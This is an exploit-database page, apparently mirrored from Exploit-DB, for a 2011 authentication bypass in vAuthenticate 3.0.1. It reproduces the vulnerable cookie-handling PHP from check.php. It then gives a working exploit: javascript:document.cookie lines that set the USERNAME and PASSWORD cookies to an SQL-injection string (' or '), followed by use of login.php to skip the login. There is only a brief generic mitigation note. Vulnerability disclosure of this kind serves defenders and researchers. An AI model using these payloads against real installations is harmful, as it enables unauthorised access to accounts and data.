header-logo
Suggest Exploit
vendor:
vAuthenticate
by:
bd0rk
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: vAuthenticate
Affected Version From: 3.0.1
Affected Version To: 3.0.1
Patch Exists: NO
Related CWE: N/A
CPE: a:beanbug:vauthenticate:3.0.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: WinVista & Ubuntu-Linux
2011

vAuthenticate 3.0.1 Auth Bypass by Cookie SQL Injection Vulnerability

A vulnerability exists in vAuthenticate 3.0.1, which allows an attacker to bypass authentication by setting the USERNAME and PASSWORD cookies to ' or ' and then using the login.php page for authentication bypass. This is due to the vulnerable code in check.php, which does not properly sanitize user-supplied input before using it in an SQL query.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL queries in an unsafe manner.
Source

Exploit-DB raw data:

-----------------------------------------------------------------------

vAuthenticate 3.0.1 Auth Bypass by Cookie SQL Injection Vulnerability

-----------------------------------------------------------------------

Author: bd0rk

Contact: bd0rk[at]hackermail.com

Date: 2011 / 08 / 30

MEZ-Time: 01:35

Tested on WinVista & Ubuntu-Linux

Affected-Software: vAuthenticate 3.0.1

Vendor: http://www.beanbug.net/vScripts.php

Download: http://www.beanbug.net/Scripts/vAuthenticate_3.0.1.zip

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Found vulnerable code in check.php:

if (isset($_COOKIE['USERNAME']) && isset($_COOKIE['PASSWORD']))
    {
        // Get values from superglobal variables
        $USERNAME = $_COOKIE['USERNAME'];
        $PASSWORD = $_COOKIE['PASSWORD'];

        $CheckSecurity = new auth();
        $check = $CheckSecurity->page_check($USERNAME, $PASSWORD);
    }
    else
    {
        $check = false;
    }

	if ($check == false)
	{

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


Exploit: javascript:document.cookie = "[USERNAME]=' or '; [PATH]";

         javascript:document.cookie = "[PASSWORD]=' or '; [PATH]";


Them use login.php 4AuthBypass :P

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



---Greetings from hot Germany, the 22 years old bd0rk. :-)

Special-Greetz: Zubair Anjum, Perle, DJTrebo, Anonymous, GolD_M, hoohead

Navigation

Suggest Exploit

Services By CQR